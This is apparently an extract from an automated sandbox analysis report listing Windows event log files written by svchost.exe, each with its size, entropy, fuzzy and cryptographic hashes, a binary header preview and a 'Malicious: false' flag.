SSDEEP:	384:eh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDK:eMAP1Qa5AgfQQgniwS
MD5:	399CAF70AC6E1E0C918905B719A0B3DD
SHA1:	62360CD0CA66E23C70E6DE3340698E7C0D789972
SHA-256:	FD081487CCB0ACEAD6F633AADBA4B977D2C9360CE8EAC36EAB4E3C84A701D849
SHA-512:	A3E17DA61D4F7C0C94FD0B67707AE35250656842D602906DE515B5E46ECD5078AC68AE607B99DC1A6061B0F896759FE46FF8EE350774205635D30363D46939EA
Malicious:	false
Preview:	ElfChnk......................................g...j..%s.g........................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&...........c..;...............................**..x...........HD................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.4364303862010575
Encrypted:	false
SSDEEP:	384:PhrE2E+EAsbE3VgEWsUiEcEf4eEOhEmELVFEEE5ejElEreEFEzEAEWE+EWEeEKEy:P3sleByhfIwPGa1SEzy
MD5:	2BB73ACC8F7419459C4BF931AB85352C
SHA1:	F1CE2EB960D3886F76094E2327DD092FC1208C7E
SHA-256:	1969400F6FC72AD4A41092FEC53A19078C98DE9FCB2507A3BD8E1930B2447B62
SHA-512:	7D882184DA11B490E111502C8193B73248259D43CC5DCE021CD7264212F1BCD3D62F2A3A2F86929663E2E904961D4F1E406E314020FE904D41694A09C1EB0457
Malicious:	false
Preview:	ElfChnk.p...............p..................../...1..V......................................................................H...................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................m..............................%................ ..................&............0......................*......p..........T..............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.0631557320109892
Encrypted:	false
SSDEEP:	384:xhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3KlZ:x1T4hGvj
MD5:	86AEA3A9CA3E5909FD44812754E52BD6
SHA1:	F79B583F83F118AC724A5A4206FC439B88BB8C65
SHA-256:	2AB21F158F9FFA0A375B2ABBD58880A732FABBC436246D40A68DD88D324428C9
SHA-512:	17796DAA6BCE3C6B7EBACD2A683D085AB08C7701DB5FF91DC2D6531E9CC23FCFC52650A6CD02D8B54D4E8C8D5B59DB1688E18571587E0431E4AA914086BE26F5
Malicious:	false
Preview:	ElfChnk.........b...............b...............0...o5@r.....................................................................2..................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.4467272005363894
Encrypted:	false
SSDEEP:	384:EEhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjD6:JzSKEqsMuy6TN
MD5:	155681C222D825199B738E8DEC707DC8
SHA1:	704C800E7313F77A218203554E1428DF2819BC34
SHA-256:	1505E543085CB6AA30119F10DF11AC8CE061DB0CAC6D44A640E711F96750C4BF
SHA-512:	ADDDE8E26D330EAA13F993D17FF4A6DE7F4120E5B36205EB69FC999B0462B21FD189317EFD1002618551EE24E5C753A09EB34955E8CF1A8E2A22D27516BAB720
Malicious:	false
Preview:	ElfChnk.........L...............L...........x.......ZZO.........................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=............................................y..................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.156155224835584
Encrypted:	false
SSDEEP:	384:MhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zE:Mmw9g3LU
MD5:	F22AC858C2ACC96E8F189E43FFE46FBD
SHA1:	540B8276921D37FCFFDA3FC7BCFAE1D99A85433B
SHA-256:	771A6E4098CB30081338F06DD7C0B54248C133F9B7B6849FDADDBD6E6FD5BCE9
SHA-512:	B4CF3C51B9FB236207B19FE697CEF6E402C6C903E7570B3938F529E5438F96E230463B9A9B17784A98E580E2B18AA9626E96AA83F705D506AF9C2A0432F0F7D5
Malicious:	false
Preview:	ElfChnk.........6...............6........... o...p..k.?........................................................................x................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#...........................................~i..................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.9197999988543422
Encrypted:	false
SSDEEP:	384:ehqID7I26vIxIPIttIo0IPrI5IMILIjI7I1IIIfrIBBLIgITI:ecx
MD5:	6C3F290FC62CFA9C240AEE8DB1DBA277
SHA1:	CFACCF81F3AA31E8DE85CEAFDAA55AA90FA18BEC
SHA-256:	7841FBB35636229AFB0389965D3DDBD0B7DF4858F1DA8A8FF434830DB8B133D6
SHA-512:	D2C60875EFADB1F3421CDC095B00E32419C0266CB4F58B17AF09A82AAA20EB488C757BA07E7562A033B84A37B3E035C405200BFB29330F79CA565FF21F5EDA88
Malicious:	false
Preview:	ElfChnk.K.......L.......K.......L...........x...86.....U......................................................................+.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..x...K.........tQ..............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	5.718426658668259
Encrypted:	false
SSDEEP:	384:Thka5Ka5WsR9o2KbzyzIz7a5NsR9o2KbzyzIzia5zzuzNz0zxzuewKWMK/2a55wt:Tdqlt94xODljQdM
MD5:	8630011707C7BFBCECC0A9430637802E
SHA1:	22247A5B6A4C01883BB14E0BD4575A3553F945CB
SHA-256:	227057F9899098B21709D53114E9DECFFCD28207BFFA178AD6B1E32F9C63EDDF
SHA-512:	972629871B28EA6D01B8762B28378F8348E592BD465FE7FD1CF6AB5BD62157230AD3BB729F6290F6EDA950AB20598110676D902756E40BA3067ED37831855076
Malicious:	false
Preview:	ElfChnk.%......./.......%......./...........(l...n.........................................................................b\.;................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&........................6..........**..P...%.......'wu~..............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9963080376858662
Encrypted:	false
SSDEEP:	384:l7h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMLaMA0MJvMZy:l7eJw
MD5:	A51AFE78FA4481FA05EDC1133C92B1D8
SHA1:	5BA44E7A99EE615E323696742DA6B930E9FF6198
SHA-256:	44C1977D16383DF6B1FFF8164F319DFD99092A124ABA7C7280D74A6BB8AD2094
SHA-512:	792E5E8F5540DCA4B7F003C1043DCBC3E0EC3F23EC4A7B0FA84357F6ABDFD84122C124DBEA2B61D3B5CEED79A3E158DBE95DFCDB20EEAC433D9CDC29C3328F22
Malicious:	false
Preview:	ElfChnk......................................)..0-....\.....................................................................\|..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................)..................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.076996627399968
Encrypted:	false
SSDEEP:	384:Ihk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS12:IBjdjP0cs6N
MD5:	A8ADBDC2B39B55444B2C844F7D81EBDE
SHA1:	F97F40E314C8A2A39953A28CB72C9270D3073418
SHA-256:	93CF0EF4C121FCBB18A8A6DA5912415AF1113816BE6A8F9B86BE6A2243408E09
SHA-512:	922D165CBE871A393D58DAABABE7D09557E242BF73C2C473C29CCB0FB3277B8119911EFF51B12238D23B613AD9C15DAB163C9757BC9006D768B2345F53436E7B
Malicious:	false
Preview:	ElfChnk.........................................X...Y}.......................................................................(.[................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................*..............5.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	83408
Entropy (8bit):	3.4529451891346645
Encrypted:	false
SSDEEP:	384:36ILTi8IfIFIbIw8IbUsIs6IChtI8IAI8IRI8IdIBZIHI0IWIYzIWIDvkI9ILhhE:3swkchZxGp9Swk
MD5:	D47A0ECFAB79D50C82A735D877B18E6C
SHA1:	B922759558C794A227CC783DA2E211FE669156C1
SHA-256:	4316CDA2E6C3EDF01E86A5549C7B16B18B62BD2F3D3669E7A4CD66FCD987E9BA
SHA-512:	BE07960E9E9F85C2D499DB36F8767191340DBBA13E1F16676D8FE88F4D15E96EC6D88CF3BD268C65CF96378B9106528A2B2FB4D91187CB7611D85FFCF2781147
Malicious:	false
Preview:	ElfChnk.T...............T...................P...h.....&................................................................................................................>...=...........................................................................................................................f...............?...........................m...................M...F............................................................n..................1................................a......a...........................**......z..........................a..............................................................,.......D.....!........... ....@........@..^<.....fX............z....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s..z.?..nM.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s./.O.p.e.r.a.t.i.o.n.a.l........n..&.......6p.\.#i....>..........2........A..=...>.../....=.......V.o.l.u.m.e.C.o.r.r.e.l.a.t.i.o.n.I.d.......A..7...>...)....=.......V.o.l.u.m.e.N.a.m.e.L.e.n.g.t.h....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.801423310886069
Encrypted:	false
SSDEEP:	384:dh6iIvcImIvITIQIoIoI3IEIMIoIBIDIcIwISIEzIJVI:doxJS
MD5:	9EAAD7982F42DFF47B8EF784DD2EE1CC
SHA1:	542608204AF6B709B06807E9466F7543C0F08818
SHA-256:	5468A48533B56DE3E8C820B870493154775356CE3913AD70EC51E0D1D0D1A366
SHA-512:	036BFABE2AC4AD623B5C439349938C0EA254BFCDAB9096A53253189D4F632A8A8A1DD00644A4573AF971AAEA6831317BFD663E35363DD870684CDD4C0A51884C
Malicious:	false
Preview:	ElfChnk.....................................X ...#..\.N......................................................................12.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................~ ..................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.996272372482282
Encrypted:	false
SSDEEP:	768:e4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH137:M
MD5:	4F68D6AF0C7DB9E98F8B592C9A07811C
SHA1:	9F519109344DD57150F16B540AAA417483EF44FE
SHA-256:	44177E6F71E240EBFE9CE63FEFBF5D46A01979E09C0C14F65F1D19AE8E97B8EE
SHA-512:	E1D5097BCD572F3DBAF4024FAEA76BAD3061CD2E05017701B578020327969C2BD3F725FBE8BFE4C40DC66336CE1371E7AB037058603B02449366DAE4EDE8DE69
Malicious:	false
Preview:	ElfChnk.....................................(...8...S......................................................................V..C................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ..................................................N...................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	76416
Entropy (8bit):	3.8900450339652832
Encrypted:	false
SSDEEP:	768:bUxutDBjV8k+u8eUtHpoVWWJ07SZRcZv76NcRUjGHzLKvc90XKcZv76NcRkpyLj/:OutDBjV8k+u8PtHpoVWo
MD5:	CAB3444FEB030AD59FEF1789AE41FE46
SHA1:	BF0497F84C43EF29B2908E0E0BCAD9D813346310
SHA-256:	D40F3BAC2398207DB6DC1B31B86CED409077BBAD1198F75BA67154BF728070CC
SHA-512:	CA66065E1326D5C8F760816BA634AD5D310C5022F2494FC2509505EDD94E7500A80F4CBF8F641119FE5609D34F9245FEB07F3A86284C5420E9613F33AEAB4E46
Malicious:	false
Preview:	ElfChnk.................O.......T...........0.........8d........................................................................................0...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..`...O.........d...............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.7376819208886465
Encrypted:	false
SSDEEP:	384:Hh+rKvKaKNP6WKkvKWKlpKuyK7YKmKaKHxqKWyK11KUIKqKq9KLjK5yKoKfKYKnR:HkN2cTOsKJtiBWzYaqBNrjzDbRt
MD5:	788871A00E6C27C90BB908A72EDDA1E8
SHA1:	19157CCCAADBA0994CB2F0519606CE31628ECFEB
SHA-256:	A07C6E6CFFFDC79DC13D91E7ABD0AA8903ABF9847207B43912C61F2FBAB44C48
SHA-512:	18C90F97384442B0CCD121AD4FF3718F0B63F846856621142223E6B1A945368294AC173A61FAA8F02320E6B3FBC63D25D850F98FA39D9D79517EE5C72E01A40C
Malicious:	false
Preview:	ElfChnk.....................................0.......!F.d....................................................................P@.O................l...........................=...........................................................................................................................f...............?...........................m...................M...F.......................E................................M..&...g`..g5......................o]...........X...Z..GP...............s......od......_i..**..P............%.o..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7590316238843728
Encrypted:	false
SSDEEP:	384:IhP8o8Z85848V8M8g8D8R8E8T8h8p8TtP8sU8:Ic
MD5:	B074238315662886E2BD70106D08A747
SHA1:	5ADA158D19401565E76349FCA97489E9FB9BFA36
SHA-256:	53770508DCDA0199A75458B5A10DC8FD2E49A4CFD0FC001C16D56F3B567AB71C
SHA-512:	9D35DC04CCE95541551254BCBB00B0E2E0860D9B6F69D40FBC829DA31FC3AC43690A049A432BA4D43315B80675143A6AA02C57484E7903845010A5AD9EC92D6D
Malicious:	false
Preview:	ElfChnk.........................................0!....H.......................................................................j........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.7510882393470117
Encrypted:	false
SSDEEP:	1536:cXhsUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:cX2nS
MD5:	7E157981F49B4361EB3619CCE1291694
SHA1:	CAD8C707B3E3D29E5F02E10B6EAE245FBF4B67E2
SHA-256:	F345ECF7939E71EA8FFFCB45BC70825228E33A83089C2700917A421568FA2738
SHA-512:	A5E99C51A0CBA84E2F57B046F1434A45E4115B2F47B07FCF1433CCF966EC1C9AAC8ABC8B7D606816FB65FADB105E7E67AB3126A496FFB620C0D03B25DCEFDEF0
Malicious:	false
Preview:	ElfChnk.........%...............%............E..`G...a.....................................................................C5.D................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................&B..........O.......................*..............g5...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.3069197485541766
Encrypted:	false
SSDEEP:	768:S0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O0apPaQOan6qa6IvV1:ycEu
MD5:	E6E4C860CE7DD1BB499D6A082B461B90
SHA1:	11330861B23B1D29D777D9BD10619A07B6A6A9C0
SHA-256:	C27431D9C64F5C9D323E2B4ED5F44781969B34F30DC4280296A329DCD6509D44
SHA-512:	7393A0FF290BB3DB07E8BB9A9FA7B666CD8B686CBDAA3FED2EBD704D6E88A4D5768D104BD768E6AA533C42588C661A863E11ED9146ABD7386A2A9B4F84583406
Malicious:	false
Preview:	ElfChnk.........;...............;............r..@t...H......................................................................p"..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F......................................&........................................................................l..............]...................*.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	modified
Size (bytes):	127536
Entropy (8bit):	4.001151727119658
Encrypted:	false
SSDEEP:	768:ah0w+qLpBVi7CPME79nCxkSqsh0w+qLpBVi7CPME79nCxkSq1g:c0w+qtBVih0w+qtBVi+g
MD5:	B0FBC2B8844E976AB0EBCB791A2FC647
SHA1:	CDFDA89EB07BEC719AAC75B9DC2FB31071F7DCE8
SHA-256:	20FFEB7CE7F39CCF55B4838D6AA69BE4C0E915DB9A913592A3AA85764284EB71
SHA-512:	D845279448ACB8B23D8759F8AADE21AC0F6648E973DB22FA302FF65AC5D0D8428E54EE5F59C4145271FC3059E98392573F3B527333550ED0969BC2B56C452B24
Malicious:	false
Preview:	ElfChnk.........#...............#........... ..............................................................................\.f................T.......................\|...=...........................................................................................................................f...............?...........................m...................M...F.......................................-...'...............&.......................................................................................*.. ............#................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.2909571978750325
Encrypted:	false
SSDEEP:	384:Ny2/hDGCyCkCzCRCFCNClCuC6CoC9rC6CdCsCvCkxCkC5CCCWCxCIC/CbCFC5CkG:Ny2/dm1sR
MD5:	B0BF4D9EC91ABBDA5D328631B125A5C0
SHA1:	E672D69127AE7C1A51046ADAA911871EC0C10ABB
SHA-256:	8DBE6F5B80B3D973BBF1177BCCAA690B9F90FC99DC358B7DE66175317C733501
SHA-512:	3132E1FCC5C8F88BD974465EA1E644CA89C2D9E041E49F8A1F48B9ACB3376F0A1042F5CB6FDFC6BE2934C4483312C35539D64DB25B892388604F9F637074BCBD
Malicious:	false
Preview:	ElfChnk.U.......~.......U.......~....................}/.....................................................................@..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................v..................................**..0...U.........Df..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.488768580471203
Encrypted:	false
SSDEEP:	1536:Q9YcieRoUlafdbkKKMAQ2SomvXCQv/2ketsvQPh8YzSJoh2VgPIEF6uq9GgCVRlW:Q9YcieRoUlaFbkKKMAQ2SomvXCM/2keU
MD5:	E3FB1708C64D250E4D801AFB8688DF35
SHA1:	8B889F0358683733257411E451A86E3A1D42159D
